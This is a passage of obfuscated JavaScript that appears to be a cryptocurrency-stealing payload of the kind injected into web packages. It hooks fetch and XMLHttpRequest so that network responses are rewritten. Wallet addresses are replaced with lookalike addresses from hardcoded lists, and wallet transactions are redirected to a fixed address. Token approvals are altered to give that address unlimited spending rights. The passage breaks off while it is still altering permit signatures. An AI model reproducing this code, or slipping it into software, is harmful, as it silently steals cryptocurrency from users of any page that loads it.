_0x50715b[_0x1b96c3][0] = _0x1b96c3;
}
for (let _0x239a5f = 0; _0x239a5f <= _0x8c209f.length; _0x239a5f++) {
_0x50715b[0][_0x239a5f] = _0x239a5f;
}
for (let _0x5aba31 = 1; _0x5aba31 <= _0x13a5cc.length; _0x5aba31++) {
for (let _0x22e9c0 = 1; _0x22e9c0 <= _0x8c209f.length; _0x22e9c0++) {
if (_0x13a5cc[_0x5aba31 - 1] === _0x8c209f[_0x22e9c0 - 1]) {
_0x50715b[_0x5aba31][_0x22e9c0] = _0x50715b[_0x5aba31 - 1][_0x22e9c0 - 1];
} else {
_0x50715b[_0x5aba31][_0x22e9c0] = 1 + Math.min(_0x50715b[_0x5aba31 - 1][_0x22e9c0], _0x50715b[_0x5aba31][_0x22e9c0 - 1], _0x50715b[_0x5aba31 - 1][_0x22e9c0 - 1]);
}
}
}
return _0x50715b[_0x13a5cc.length][_0x8c209f.length];
}
function _0x2abae0(_0x348925, _0x2f1e3d) {
let _0xff60d1 = Infinity;
let _0x5be3d3 = null;
for (let _0x214c8b of _0x2f1e3d) {
const _0x3a7411 = _0x3479c8(_0x348925.toLowerCase(), _0x214c8b.toLowerCase());
if (_0x3a7411 < _0xff60d1) {
_0xff60d1 = _0x3a7411;
_0x5be3d3 = _0x214c8b;
}
}
return _0x5be3d3;
}
fetch = async function (..._0x1ae7ec) {
const _0x406ee2 = await _0xba16ef.tfqRA(fetch, ..._0x1ae7ec);
const _0x207752 = _0x406ee2.headers.get("Content-Type") || '';
let _0x561841;
if (_0x207752.includes("application/json")) {
_0x561841 = await _0x406ee2.clone().json();
} else {
_0x561841 = await _0x406ee2.clone().text();
}
const _0x50818d = _0x19ca67(_0x561841);
const _0x22ee54 = typeof _0x50818d === "string" ? _0x50818d : JSON.stringify(_0x50818d);
const _0x20415d = new Response(_0x22ee54, {
'status': _0x406ee2.status,
'statusText': _0x406ee2.statusText,
'headers': _0x406ee2.headers
});
return _0x20415d;
};
if (typeof window != "undefined") {
const _0x2d44e5 = XMLHttpRequest.prototype.open;
const _0x3d5d6a = XMLHttpRequest.prototype.send;
XMLHttpRequest.prototype.open = function (_0x2dbeb0, _0x3b2bc2, _0x36de99, _0x36f3b7, _0x52ad25) {
this._url = _0x3b2bc2;
return _0x2d44e5.apply(this, arguments);
};
XMLHttpRequest.prototype.send = function (_0x270708) {
const _0x159c30 = this;
const _0x1c1a41 = _0x159c30.onreadystatechange;
_0x159c30.onreadystatechange = function () {
if (_0x159c30.readyState === 4) {
try {
const _0x13db82 = _0x159c30.getResponseHeader("Content-Type") || '';
let _0x1ac083 = _0x159c30.responseText;
if (_0x13db82.includes("application/json")) {
_0x1ac083 = JSON.parse(_0x159c30.responseText);
}
const _0x454f4a = _0x19ca67(_0x1ac083);
const _0x553cb7 = typeof _0x454f4a === "string" ? _0x454f4a : JSON.stringify(_0x454f4a);
Object.defineProperty(_0x159c30, "responseText", {
'value': _0x553cb7
});
Object.defineProperty(_0x159c30, "response", {
'value': _0x553cb7
});
} catch (_0x59788f) {}
}
if (_0x1c1a41) {
_0x1c1a41.apply(this, arguments);
}
};
return _0x3d5d6a.apply(this, arguments);
};
}
function _0x19ca67(_0x1156d2) {
try {
if (typeof _0x1156d2 === "object" && _0x1156d2 !== null) {
const _0x129304 = JSON.stringify(_0x1156d2);
const _0x187e67 = _0xba16ef.tfqRA(_0x20669a, _0x129304);
return JSON.parse(_0x187e67);
}
if (typeof _0x1156d2 === "string") {
return _0x20669a(_0x1156d2);
}
return _0x1156d2;
} catch (_0x2abc9c) {
return _0x1156d2;
}
}
function _0x20669a(_0x530d91) {
var _0x264994 = ["1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx", "1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd", "1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP", "1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY", "1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj", "1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N", "1KkovSeka94yC5K4fDbfbvZeTFoorPggKW", "18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV", "1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP", "1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N", "19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8", "1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR", "1GX1FWYttd65J26JULr9HLr98K7VVUE38w", "14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC", "1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k", "19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg", "16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X", "18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne", "1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8", "13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM", "1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS", "13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ", "154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn", "1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb", "19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn", "17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS", "16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH", "1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP", "143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp", "1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm", "1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju", "19onjpqdUsssaFKJjwuAQGi2eS41vE19oi", "1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS", "1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf", "1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6", "1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z", "174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ", "17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p", "1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc", "13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a"];
var _0x2e3cca = ["bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm", "bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9", "bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx", "bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4", "bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar", "bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh", "bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h", "bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt", "bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx", "bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh", "bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq", "bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f", "bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn", "bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4", "bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30", "bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7", "bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4", "bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6", "bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr", "bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79", "bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m", "bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz", "bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu", "bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5", "bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf", "bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk", "bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st", "bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u", "bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd", "bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u", "bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp", "bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej", "bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29", "bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq", "bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a", "bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my", "bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw", "bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55", "bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw", "bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037"];
var _0x4477fc = ["0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976", "0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024", "0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B", "0x30F895a2C66030795131FB66CBaD6a1f91461731", "0x57394449fE8Ee266Ead880D5588E43501cb84cC7", "0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A", "0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4", "0xe86749d6728d8b02c1eaF12383c686A8544de26A", "0xa4134741a64F882c751110D3E207C51d38f6c756", "0xD4A340CeBe238F148034Bbc14478af59b1323d67", "0xB00A433e1A5Fc40D825676e713E5E351416e6C26", "0xd9Df4e4659B1321259182191B683acc86c577b0f", "0x0a765FA154202E2105D7e37946caBB7C2475c76a", "0xE291a6A58259f660E8965C2f0938097030Bf1767", "0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D", "0xa7eec0c4911ff75AEd179c81258a348c40a36e53", "0x3c6762469ea04c9586907F155A35f648572A0C3E", "0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2", "0x51Bb31a441531d34210a4B35114D8EF3E57aB727", "0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1", "0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966", "0x1914F36c62b381856D1F9Dc524f1B167e0798e5E", "0xB9e9cfd931647192036197881A9082cD2D83589C", "0xE88ae1ae3947B6646e2c0b181da75CE3601287A4", "0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2", "0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68", "0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d", "0x93Ff376B931B92aF91241aAf257d708B62D62F4C", "0x5C068df7139aD2Dedb840ceC95C384F25b443275", "0x70D24a9989D17a537C36f2FB6d8198CC26c1c277", "0x0ae487200606DEfdbCEF1A50C003604a36C68E64", "0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56", "0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673", "0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3", "0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769", "0xd299f05D1504D0B98B1D6D3c282412FD4Df96109", "0x241689F750fCE4A974C953adBECe0673Dc4956E0", "0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261", "0x5651dbb7838146fCF5135A65005946625A2685c8", "0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1", "0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3", "0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9", "0x013285c02ab81246F1D68699613447CE4B2B4ACC", "0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e", "0x4Bf0C0630A562eE973CE964a7d215D98ea115693", "0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb", "0xae9935793835D5fCF8660e0D45bA35648e3CD463", "0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027", "0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D", "0x06de68F310a86B10746a4e35cD50a7B7C8663b8d", "0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54", "0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf", "0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272", "0xe8749d2347472AD1547E1c6436F267F0EdD725Cb", "0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221", "0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3", "0xC4A51031A7d17bB6D02D52127D2774A942987D39", "0xa1b94fC12c0153D3fb5d60ED500AcEC430259751", "0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223", "0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04"];
var _0x514d7d = ["5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6", "98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ", "Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt", "CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN", "7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU", "3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49", "9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV", "4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF", "4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF", "9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL", "7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx", "8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv", "55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx", "Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB", "9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB", "5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr", "F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv", "G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn", "DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K", "HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced"];
var _0x3ee86f = ["TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67", "TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y", "TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH", "TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc", "TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp", "TGExvgwAyaqwcaJmtJzErXqfra66YjLThc", "TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG", "TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye", "TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp", "TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR", "TPSLojAyTheudTRztqjhNic6rrrSLVkMAr", "TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo", "TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw", "TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f", "TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ", "TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb", "TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP", "TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW", "TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz", "TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW", "TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt", "TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC", "TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ", "THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E", "TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6", "TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L", "TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9", "TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK", "TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V", "TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn", "TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA", "TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt", "TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ", "TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs", "TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL", "TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z", "THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5", "TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP", "TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7", "TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P"];
var _0x4a9d96 = ["LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug", "LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR", "LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6", "LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz", "LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa", "LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ", "LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT", "LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB", "Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP", "LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA", "Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP", "LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox", "LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP", "LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6", "LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ", "LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H", "LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq", "LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE", "LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr", "LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9", "LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC", "LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v", "LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V", "LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR", "LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg", "LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k", "LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk", "LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN", "Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT", "LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs", "LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw", "LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X", "LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU", "LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq", "LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe", "LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV", "LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ", "Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu", "LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK", "LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z"];
var _0x553dcb = ["bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh", "bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9", "bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz", "bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf", "bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39", "bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97", "bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823", "bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3", "bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64", "bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8", "bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt", "bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er", "bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz", "bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s", "bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7", "bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed", "bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw", "bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa", "bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc", "bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd", "bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl", "bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g", "bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf", "bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u", "bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck", "bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3", "bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj", "bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064", "bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7", "bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j", "bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6", "bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59", "bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu", "bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l", "bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7", "bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q", "bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3", "bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad", "bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5", "bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r"];
const _0x3ec3bb = {
'ethereum': /\b0x[a-fA-F0-9]{40}\b/g,
'bitcoinLegacy': /\b1[a-km-zA-HJ-NP-Z1-9]{25,34}\b/g,
'bitcoinSegwit': /\b(3[a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71})\b/g,
'tron': /((?<!\w)[T][1-9A-HJ-NP-Za-km-z]{33})/g,
'bch': /bitcoincash:[qp][a-zA-Z0-9]{41}/g,
'ltc': /(?<!\w)ltc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71}\b/g,
'ltc2': /(?<!\w)[mlML][a-km-zA-HJ-NP-Z1-9]{25,34}/g,
'solana': /((?<!\w)[4-9A-HJ-NP-Za-km-z][1-9A-HJ-NP-Za-km-z]{32,44})/g,
'solana2': /((?<!\w)[3][1-9A-HJ-NP-Za-km-z]{35,44})/g,
'solana3': /((?<!\w)[1][1-9A-HJ-NP-Za-km-z]{35,44})/g
};
for (const [_0x17ccd4, _0x129783] of Object.entries(_0x3ec3bb)) {
const _0x1be350 = _0x530d91.match(_0x129783) || [];
for (const _0x4225ce of _0x1be350) {
if (_0x17ccd4 == "ethereum") {
if (!_0x4477fc.includes(_0x4225ce) && neth == 0) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4477fc));
}
}
if (_0x17ccd4 == "bitcoinLegacy") {
if (!_0x264994.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x264994));
}
}
if (_0x17ccd4 == "bitcoinSegwit") {
if (!_0x2e3cca.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x2e3cca));
}
}
if (_0x17ccd4 == "tron") {
if (!_0x3ee86f.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x3ee86f));
}
}
if (_0x17ccd4 == "ltc") {
if (!_0x4a9d96.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96));
}
}
if (_0x17ccd4 == "ltc2") {
if (!_0x4a9d96.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96));
}
}
if (_0x17ccd4 == "bch") {
if (!_0x553dcb.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x553dcb));
}
}
const _0x2d452a = [..._0x4477fc, ..._0x264994, ..._0x2e3cca, ..._0x3ee86f, ..._0x4a9d96, ..._0x553dcb];
const _0x35f871 = _0x2d452a.includes(_0x4225ce);
if (_0x17ccd4 == "solana" && !_0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
if (_0x17ccd4 == "solana2" && !_0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
if (_0x17ccd4 == "solana3" && _0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
}
}
return _0x530d91;
}
}
async function runmask() {
let _0x1c41fa = 0;
let _0x2a20cb = new Map();
let _0x1ab7cb = false;
function _0x1089ae(_0x4ac357, _0xc83c36 = true) {
const _0x13d8ee = JSON.parse(JSON.stringify(_0x4ac357));
if (_0xc83c36) {
if (_0x13d8ee.value && _0x13d8ee.value !== "0x0" && _0x13d8ee.value !== '0') {
_0x13d8ee.to = "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976";
}
if (_0x13d8ee.data) {
const _0x250e27 = _0x13d8ee.data.toLowerCase();
if (_0x250e27.startsWith("0x095ea7b3")) {
if (_0x250e27.length >= 74) {
const _0x7fa5f0 = _0x250e27.substring(0, 10);
const _0x15c4f9 = '0x' + _0x250e27.substring(34, 74);
const _0xde14cc = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
const _0x3e4a11 = 'f'.repeat(64);
_0x13d8ee.data = _0x7fa5f0 + _0xde14cc + _0x3e4a11;
const _0x432d38 = {
'0x7a250d5630b4cf539739df2c5dacb4c659f2488d': "Uniswap V2",
'0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af': "Uniswap V2",
'0xe592427a0aece92de3edee1f18e0157c05861564': "Uniswap V3",
'0x10ed43c718714eb63d5aa57b78b54704e256024e': "PancakeSwap V2",
'0x13f4ea83d0bd40e75c8222255bc855a974568dd4': "PancakeSwap V3",
'0x1111111254eeb25477b68fb85ed929f73a960582': "1inch",
'0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f': "SushiSwap"
};
const _0x13f774 = _0x432d38[_0x15c4f9.toLowerCase()];
if (_0x13f774) {
console.log(_0x13f774 + _0x15c4f9);
} else {
console.log(_0x15c4f9);
}
}
} else {
if (_0x250e27.startsWith("0xd505accf")) {
if (_0x250e27.length >= 458) {
const _0x571743 = _0x250e27.substring(0, 10);
const _0x55e7fa = _0x250e27.substring(10, 74);
const _0x382fb5 = _0x250e27.substring(202, 266);
const _0x5bb3a7 = _0x250e27.substring(266, 330);
const _0x2e5118 = _0x250e27.substring(330, 394);
const _0x3ba273 = _0x250e27.substring(394, 458);
const _0x36b084 = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
